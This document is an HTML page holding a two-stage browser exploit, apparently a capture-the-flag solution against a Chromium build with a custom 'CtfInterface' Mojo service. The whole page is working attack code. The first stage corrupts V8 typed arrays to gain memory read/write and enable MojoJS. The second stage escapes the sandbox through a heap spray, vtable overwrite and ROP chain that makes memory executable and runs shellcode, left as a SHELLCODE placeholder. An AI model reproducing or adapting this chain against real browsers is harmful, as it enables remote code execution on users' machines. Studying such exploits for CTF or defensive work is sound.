<!DOCTYPE html>
<html>
    <head>
        <title>yoshiking - browser</title>
        <script src="mojo/mojo_bindings.js"></script>
        <script src="mojo/third_party/blink/public/mojom/CTF/ctf_interface.mojom.js"></script>
    </head>
    <body>
        <script>
         /**
          * Utils
          */
         let conversion_buffer = new ArrayBuffer(8);
         let float_view = new Float64Array(conversion_buffer);
         let int_view = new BigUint64Array(conversion_buffer);
         BigInt.prototype.hex = function() {
             return '0x' + this.toString(16);
         };
         BigInt.prototype.i2f = function() {
             int_view[0] = this;
             return float_view[0];
         }
         Number.prototype.f2i = function() {
             float_view[0] = this;
             return int_view[0];
         }

         let shellcode = SHELLCODE;

         /**
          * Exploit
          */
         function pwn_v8()
         {
             function make_primitives() {
                 let evil   = new Uint32Array(1);
                 let victim = new Uint32Array(1);
                 let oob_double = [1.1, 1.1, 1.1, 1.1];
                 let arr_addrof = [{}];
                 let www_double = new Float64Array(1);
                 evil.set([0x8888], 0);
                 victim.set(evil, 32);
                 console.log("[+] oob_double.length = " + oob_double.length);
                 return [oob_double, arr_addrof, www_double];
             }

             let [oob_double, arr_addrof, www_double] = make_primitives();
             let heap_upper = oob_double[28].f2i() & 0xffffffff00000000n;
             console.log("[+] heap_upper = " + heap_upper.hex());
             let original_28 = oob_double[28];
             let original_29 = oob_double[29];

             function addrof(obj) {
                 arr_addrof[0] = obj;
                 return (oob_double[7].f2i() & 0xffffffffn) - 1n;
             }
             function aar64(addr) {
                 oob_double[28] = ((addr & 0xffffffff00000000n) | 7n).i2f();
                 oob_double[29] = (((addr - 8n) | 1n) & 0xffffffffn).i2f();
                 return www_double[0].f2i();
             }
             function aaw64(addr, value) {
                 oob_double[28] = ((addr & 0xffffffff00000000n) | 7n).i2f();
                 oob_double[29] = (((addr - 8n) | 1n) & 0xffffffffn).i2f();
                 www_double[0] = value.i2f();
             }
             function cleanup() {
                 oob_double[28] = original_28;
                 oob_double[29] = original_29;
             }

             /* Leak chrome base */
             let div = document.createElement('div');
             let addr_div = heap_upper | addrof(div);
             console.log("[+] addr_div = " + addr_div.hex());
             let addr_HTMLDivElement = aar64(addr_div + 0xCn);
             console.log("[+] <HTMLDivElement> = " + addr_HTMLDivElement.hex());
             let chrome_base = addr_HTMLDivElement - 0xc1bb7c0n;
             console.log("[+] chrome_base = " + chrome_base.hex());

             /* Enable MojoJS */
             console.log("[+] Overwriting flags..");
             let addr_flag_MojoJS = chrome_base + 0xc560f0en;
             let addr_flag_MojoJSTest = chrome_base + 0xc560f0fn;
             aaw64(addr_flag_MojoJS & 0xfffffffffffffff8n, 0x0101010101010101n);
             aaw64(addr_flag_MojoJSTest & 0xfffffffffffffff8n, 0x0101010101010101n);

             /* Cleanup */
             cleanup();
             location.href += "#sbx";
             location.reload();
         }

         async function pwn_sbx() {
             let spray = [];
             for (let i = 0; i < 0x100; i++) {
                 let p = new blink.mojom.CtfInterfacePtr();
                 Mojo.bindInterface(blink.mojom.CtfInterface.name,
                                    mojo.makeRequest(p).handle, 'context', true);
                 await p.resizeVector(0x60 / 8); // sizeof(CtfInterface)
                 await p.write(1.1, 1);
                 spray.push(p);
             }

             /* Create the target */
             let evil = new blink.mojom.CtfInterfacePtr();
             Mojo.bindInterface(blink.mojom.CtfInterface.name,
                                mojo.makeRequest(evil).handle, 'context', true);
             await evil.resizeVector(0x60 / 8); // sizeof(CtfInterface)
             await evil.write(3.14, 0);

             for (let i = 0; i < 0x100; i++) {
                 let p = new blink.mojom.CtfInterfacePtr();
                 Mojo.bindInterface(blink.mojom.CtfInterface.name,
                                    mojo.makeRequest(p).handle, 'context', true);
                 await p.resizeVector(0x60 / 8); // sizeof(CtfInterface)
                 await p.write(1.1, 1);
                 spray.push(p);
             }

             /* Find evil */
             let addr_evil = null;
             let addr_elm = null;
             let chrome_base = null;
             for (let i = 1; i < 0x80; i++) {
                 let a0 = (await evil.read((0x60 / 8) * i + 0)).value.f2i();
                 let a1 = (await evil.read((0x60 / 8) * i + 1)).value.f2i();
                 let a2 = (await evil.read((0x60 / 8) * i + 2)).value.f2i();
                 if (a0 != 0n && a1 == 0n && a2 == 0n) {
                     let a6 = (await evil.read((0x60 / 8) * i + 6)).value.f2i();
                     let a7 = (await evil.read((0x60 / 8) * i + 7)).value.f2i();
                     addr_evil = a0;
                     addr_elm = a6 - 0x18n - BigInt(0x60 * i);
                     chrome_base = a7 - 0xbc77518n;
                     break;
                 }
             }
             if (addr_elm == null) {
                 console.log("[-] Bad luck!");
                 return location.reload();
             }
             let offset = Number((addr_evil - addr_elm) / 8n);
             console.log("[+] offset = " + offset);
             if (offset < 0) {
                 console.log("[-] Bad luck!");
                 return location.reload();
             }
             console.log("[+] addr_evil = " + addr_evil.hex());
             console.log("[+] addr_elm = " + addr_elm.hex());
             console.log("[+] chrome_base = " + chrome_base.hex());

             /* Find victim */
             let original_1, original_2, original_3;
             let victim_ofs = null;
             for (let i = 1; i < 0x100; i++) {
                 let v = (await evil.read(offset + (0x60 / 8) * i)).value.f2i();
                 if ((v & 0xfffn) == 0x4e0n) {
                     console.log("[+] Probing victim...");
                     original_1 = (await evil.read(offset + (0x60/8)*i+1)).value;
                     original_2 = (await evil.read(offset + (0x60/8)*i+2)).value;
                     original_3 = (await evil.read(offset + (0x60/8)*i+3)).value;
                     await evil.write(chrome_base.i2f(), offset + (0x60 / 8) * i + 1);
                     victim_ofs = i;
                     break;
                 }
             }
             if (victim_ofs == null) {
                 console.log("[-] Bad luck!");
                 return location.reload();
             }
             async function cleanup() {
                 await evil.write(original_1,
                                  offset + (0x60 / 8) * victim_ofs + 1);
                 await evil.write(original_2,
                                  offset + (0x60 / 8) * victim_ofs + 2);
                 await evil.write(original_3,
                                  offset + (0x60 / 8) * victim_ofs + 3);
             }
             let victim = null;
             for (let p of spray) {
                 if ((await p.read(0)).value.f2i() == 0x10102464c457fn) {
                     victim = p;
                     console.log("[+] Found victim!");
                     break;
                 }
             }
             if (victim == null) {
                 console.log("[-] Bad luck!");
                 cleanup();
                 return location.reload();
             }

             /* Primitives */
             async function aar64(addr) {
                 await evil.write(addr.i2f(),
                                  offset + (0x60 / 8) * victim_ofs + 1);
                 await evil.write((addr + 0x10n).i2f(),
                                  offset + (0x60 / 8) * victim_ofs + 2);
                 await evil.write((addr + 0x10n).i2f(),
                                  offset + (0x60 / 8) * victim_ofs + 3);
                 return (await victim.read(0)).value.f2i();
             }
             async function aaw64(addr, value) {
                 await evil.write(addr.i2f(),
                                  offset + (0x60 / 8) * victim_ofs + 1);
                 await evil.write((addr + 0x10n).i2f(),
                                  offset + (0x60 / 8) * victim_ofs + 2);
                 await evil.write((addr + 0x10n).i2f(),
                                  offset + (0x60 / 8) * victim_ofs + 3);
                 await victim.write(value.i2f(), 0);
             }

             let rop_pop_rdi = chrome_base + 0x035d445dn;
             let rop_pop_rsi = chrome_base + 0x0348edaen;
             let rop_pop_rdx = chrome_base + 0x03655332n;
             let rop_pop_rax = chrome_base + 0x03419404n;
             let rop_syscall = chrome_base + 0x0800dd77n;
             let rop_xchg_rax_rsp = chrome_base + 0x0590510en
             let addr_shellcode = addr_elm & 0xfffffffffffff000n;
             for (let i = 0; i < 0x100; i++) {
                 let v = await aar64(addr_shellcode + BigInt(i*0x10+8));
                 if (v.i2f() == 1.1) {
                     console.log("[+] Found!");
                     addr_shellcode += BigInt(i*0x10);
                     break;
                 }
             }
             console.log("[+] addr_shellcode = " + addr_shellcode.hex());
             let rop = [
                 rop_pop_rdi,
                 addr_shellcode & 0xfffffffffffff000n,
                 rop_pop_rsi,
                 rop_xchg_rax_rsp, // vtable target
                 rop_pop_rsi,
                 0x2000n,
                 rop_pop_rdx,
                 7n,
                 rop_pop_rax,
                 10n,
                 rop_syscall,
                 addr_shellcode
             ];
             for (let i = 0; i < rop.length; i++) {
                 await evil.write(rop[i].i2f(), i);
             }
             for (let i = 0; i < shellcode.length; i++) {
                 await aaw64(addr_shellcode + BigInt(i*8), shellcode[i].f2i());
             }

             await aaw64(addr_evil, addr_elm);
             for (let p of spray) {
                 p.read(0);
             }

             console.log("[+] Done");
             cleanup();
         }

         if (location.hash == "") {
             console.log("[+] Renderer exploit!");
             pwn_v8();
         } else {
             console.log("[+] Browser exploit!");
             pwn_sbx();
         }
        </script>
    </body>
</html>
